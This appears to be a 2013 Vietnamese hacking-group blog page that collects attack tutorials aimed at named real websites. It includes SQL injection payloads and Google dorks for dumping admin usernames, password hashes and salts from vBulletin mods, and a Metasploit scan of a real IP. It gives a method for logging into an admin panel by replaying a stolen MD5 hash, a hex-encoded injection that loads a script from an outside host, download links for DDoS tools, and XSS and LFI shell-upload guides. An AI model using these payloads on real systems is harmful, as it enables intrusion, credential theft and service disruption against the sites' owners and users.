Hiển thị các bài đăng có nhãn Website Hacking. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Website Hacking. Hiển thị tất cả bài đăng

Thứ Năm, 18 tháng 4, 2013

Scan Victim bằng Metasploit

Mình đã viết một bài về Metasploit framwork rồi.
Phần này mình viết tiếp về nó.Dù nó ko liên quan gì lắm với nhau )
Phần này mình đề cập tiếp đến vấn đề scan mục tiêu cần attack đã nói trong phần trước.
Scan mục tiêu là vấn đề rất quan trọng.thu thập đc càng nhiều thông tin càng tốt.Chả thừa gì đối với chúng ta cả.
Trong metasploit framework có một module sử dụng bộ công cụ scan nmap .Trong quá trình họat động nó sử dụng giữ liệu thu đc bằng quá trình scan bởi nmap một cách tự động.
Như mình từng đề cập ở nhiều bài trước.Làm gì thì làm.Trước khi dùng mấy bộ công cụ này thì tốt nhất là nên update trước.Dữ liệu của nó cập nhật theo ngày.Nên update là ko thừa.

Step1: Vào msfconsole ,rồi type db_nmap
root@bt:~# msfconsole
msf > db_nmap
[*] Usage: db_nmap [nmap options]


Nhận đc thông báo nmap_option --> ta có thể sử dụng các option của nmap thông thường.
Thử scan victim nào đó nhé.Hộm nó mới có con shell trên honda67.com mấy mem up lên huynhdegroup.net.Hôm nay vào tên nào đã deface rồi.Nên lấy nó test luôn.

Ip của honda67.com là 112.78.2.15
msf > db_nmap 112.78.2.15
 



SQLI Mod vB4 Gift Music

################################################## ####
# SQLI Mods vB4 Gift Music

# Google Dork: dork là misc.php?do=music_full&id=

# Exploit Author: GhostVN
################################################## ####

Exploitation:
http://domains.com/forum/misc.php?do=music_full&id=null

http://domains.com/forum/misc.php?do=music_full&id=20 UNION SELECT 1,group_concat(username,0x7c,password,0x7c,email,0 x7c,salt),3,4,5,6,7,8,9,10,11,12,13,14,15 from user where userid=1-- -


Tut by GhostVN_VHB

Một số Tool DDOS



-Anonymous DoSer http://www.mediafire.com/?rrbmmms8c62jymr

- Anonymous External Attack http://www.mediafire.com/?49imnv3wh5fa4b5

-ByteDOS v3.2 http://www.mediafire.com/?ecbjw425kl4xtoj

-Hoic Vercion v2.1 http://www.mediafire.com/?q7jzd7z991z7k82

-LOIC http://www.mediafire.com/?79b5xqa10ddcnro

-PoWeRFuL DoSeR http://www.mediafire.com/?04q00er3z54kmzr

-Jays Booter http://www.mediafire.com/?q5ba9kb0cwuu5c5

-Site_Hog_v1_Release http://www.mediafire.com/?m9627jc0v2i12vd

-SYN-Flood-DOS http://www.mediafire.com/?jzax9kg4dhn1y6v

-Turbinas VolkSv1 http://www.mediafire.com/?af5f3fezzcxaabn

-rDos + Port Scanner http://www.mediafire.com/?juvcot3l11llt1x

-GoodBye v3.0 http://www.mediafire.com/?zyam8r9i05qb3kc

-Unicorn Booter (Download Link Available Soon)

-Joker IP Reserve Tool http://www.mediafire.com/?48vkvi3cgns5pa8


Tut by Vohinh95

Bug Topx vBB


Rảnh rỗi làm cái TUT này. Hi vọng giúp ích được cho các NewBie như mình của VHB.

Link Download:



END TUT!



Tut by KyoBin

Video Clip Hack Server FPT Telecom

Chào anh VHB, tối qua trongkhang98 mới làm video clip về Hacking attack WebServer FPT, post lên cho anh em tham khảo!

Nếu thấy hay thì thanks tinh thần ủng hộ VHB. Trong Tut có dùng tools "Crack Mật Khẩu thần chưởng" của X-T và mong Soliel sẽ post bài bên blog!


                  



                   

Click vào hình ảnh trên nhé

Trong Video có rất nhiều CSDL, anh em nào cần có thể xem xét qua, nhưng tuyệt đối không nên gây ảnh hưởng đến sự hoạt động của hệ thống nhé! Cảm ơn VHB Family!


Tut By Trongkhang98

Thứ Ba, 2 tháng 4, 2013

[ Local Attack ] Video Local SV Win


http://www.mediafire.com/?xbnwn046v6rvy0p


Pass download: XT_VHB

Tut By: X-T

[ SQLI ] Bypass bằng phương pháp Enable Post data



Tut by: CallBoyBLF

Cách login khi không decode đc md5 đối với 1 số site

Cách login khi không decode đc md5 đối với 1 số site
================
Tut by Leorius - VHB - Dành cho newbie, miễn gạch đá

1. Chào các bạn, mình mạo muội làm tut login khi không decode được MD5
đối với một số website mã hoá MD5 trước khi post dữ liệu lên server.

Yêu cầu:

+ Victim: http://traanh.vn/
+ Addon Tamper (Firefox) hoặc các addon tương tự

2. Trước tiên là tìm User,Pass:

http://traanh.vn/?frame=product_deta...m%20tbl_user--


1|admin|c2a26024ce725f94d9b9e90f6a618ba3
2|phamvan|48472492c504e777a664efeff27d9fee
Tình hình là thử đối với các site decode MD5 lớn cho chuỗi c2a26024ce725f94d9b9e90f6a618ba3 mà không được.

Thay vì bỏ, thì còn phương án sau.

3. Tìm link admin, thử login với user là admin (get được ở trên) và pass bất kì (123456):

http://traanh.vn/admin/

4. Bạn để ý chuỗi pass bạn nhập ban đầu chỉ 6 ký tự, nhưng sau khi bấm submit thì chuỗi pass dài ra, tư duy một tí đoán là admincp này mã hoá MD5 bằng JavaScript trước khi post lên server xử lý.

Đến đây có lẽ vấn đề đã được giải quyết:

+ Bật tamper lên
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)

Video:
 
Video hướng dẫn


Tut by: Leorius

[ SQLI ] Magic convert

Victim: http://nchla.org/

Các pro chắc chắn rất thành thạo phương pháp này rồi. TUT này mình làm cho các bạn newbie ai chưa biết thì tham khảo thôi. Mình newbie, mới tập tành làm TUT nên không tránh khỏi thiếu sót có gì các bạn cứ góp ý để lần sau mình sửa.

Link video nhẹ chỉ có 2Mb thôi: http://www.mediafire.com/?01ob9lso9qpjauz

Pass mediafire và winrar: vhb

[ SQLI ] SQLI site TQ

Lang thang trên mạng tình cờ kiếm được em Tàu làm cái tut sqli

Victim: http://hamu.com.cn/
Link tut : http://www.mediafire.com/?mc8171u0p7e7dam
pass: vhb

Hi vọng giúp các bạn newbie hiểu rõ thêm sqli injection

P/s: Đây là tut đầu tay mọi người góp ý kiến thêm nha.

Tut by: S019ua

[ SQLI ] Error base

http://www.mediafire.com/?lqp7cmd25g93123

pass: vhb

Tut by: Bạch Cốt Tinh

[ Exploit ] Inferno vBShout SQLI 0day <= 2.5.2

Vào coi exploit-db.com có cái này hay nên làm lun cái tut cho anh em coi.

Đầu tiên vào google.vn search dork sau :


Code:
inurl:infernoshout.php?do=options&area=commands
Ra được 1 nùi site. Mình chọn site này làm Victim :

 http://www.cinemekan.com/infernoshout.php?do=options&area=commands




Ô Command Input nhập :

' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,

password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x 

from information_schema.tables group by x)a) AND ''='#
Ô Command Output thì nhập cái gì cũng được. Sau đó nhấn Save Settings


Sau đó nhấn Ctrl + U trên bàn phím. Và kéo xuống dưới cùng sẽ ra 1 trang chứa thông thông user + password+ salt của nó .


Xong bây h chúng ta có thể login bằng cookie vào được tài khoản admin rùi.

tut ngắn gọn, có gì sai mong được mọi người góp ý. Chúc mọi người thành công và vui vẻ

Tut By X-T

[ SQLI ] khai thác SQL với Javascript

Làm bài tut khai thác SQL bằng javascript cho anh em đỡ mỏi tay

file javascript


các bác tải về để sẵn khi nào dùng , lỡ em nó die

đoạn script
concat((0x3c736372697074207372633d22687474703a2f2f 6875757461692e6e65742f73716c692e6a73223e3c2f736372 6970743e))volcano
concat((0x<script src="http://huutai.net/sqli.js"></script>))volcano
Video TUT

[ SQLI ]Seach SQL bằng Soft





Tut By: Ongtrum_vhb


[ SQLI ] Up Shell trên Admin Cp



http://www.youtube.com/watch?feature=player_embedded&v=mp3OaoMcDS0


Tut By:   Ongtrum_vhb

Thực hành hacking trên WebGoat

Hi a e trong VHB, mình thấy mọi người trong VHB rất có hứng thú với Hacking. Hôm nay mình sẽ giới thiệu cho a e về WebGoat - 1 trang web a e có thể thực hành hack với những lỗi phổ biến nhất XSS, SQL
và cũng sẽ có những hướng dẫn chi tiết nhất cho các bạn về lỗi đó và hướng giải quyết cho a e
Ai biết rồi thì thôi nhé, ko quăng gạch đá kẻo vỡ đầu >"<
Ở đây mình đã include hết các thứ rồi, các bạn chỉ cần đem về giải nén rồi ném folder xampp vào ở C hay D gì cũng được để vào cho dễ nhé

Link downoad:
http://www.mediafire.com/?4um44qlgki17efi
http://www.mediafire.com/?1bawsz253izt4s4
Pass: vhb_zaizaiqa


Tut By: zaizaiqa

[ LFI ] Up shell bằng phương pháp LFI




http://www.mediafire.com/?x64br4bxe4194t7

pass: vhb_zaizaiqa


Tut By: Zaizaiqa

[ LFI ]tổng hợp 1 số TUT về LFI


Sql thì không cần phải bàn cãi, nó xuất hiện quá nhiều và mọi người thường xuyên sử dụng nó để khai thác lỗi, ngoài sql ra vẫn còn nhiều lỗi khá thông dụng, trong đó có lỗi LFI mà a e ta có chiều hướng bỏ qua chọn sql cho đỡ lằng nhằng, sau đây là 1 số TUT mà mình đã tổng hợp qua nhiều nguồn và chọn lọc các TUT hay và ý nghĩa, hy vọng qua đó a e có thể có 1 cái nhìn khác về lỗi LFI này



Pass download: w0lf


Tut by:  w0lf





[ XSS ] Tut XSS Mp3.zing.vn

http://www.mediafire.com/?e5kooae23jyyiiz
Pass: vnhack

Demo Online: http://tinyurl.com/8h5wvmm

Tutorial tấn công Cross Site Scripting.

Victim: Mp3.zing.vn

Mô tả: Bypass filter đơn giản + kết hợp event trong HTML để thực thi script.

P/S: qua TUT này có thể phát triển để tấn công phishing hoặc social engineering hacking nếu biết vận dụng.

TUT này đã làm tut ảnh rồi, mà giờ làm lại video cho dể hiểu cách view source bypass filter với vận dụng chút kiến thức HTML căn bản thôi .

Enjoy it.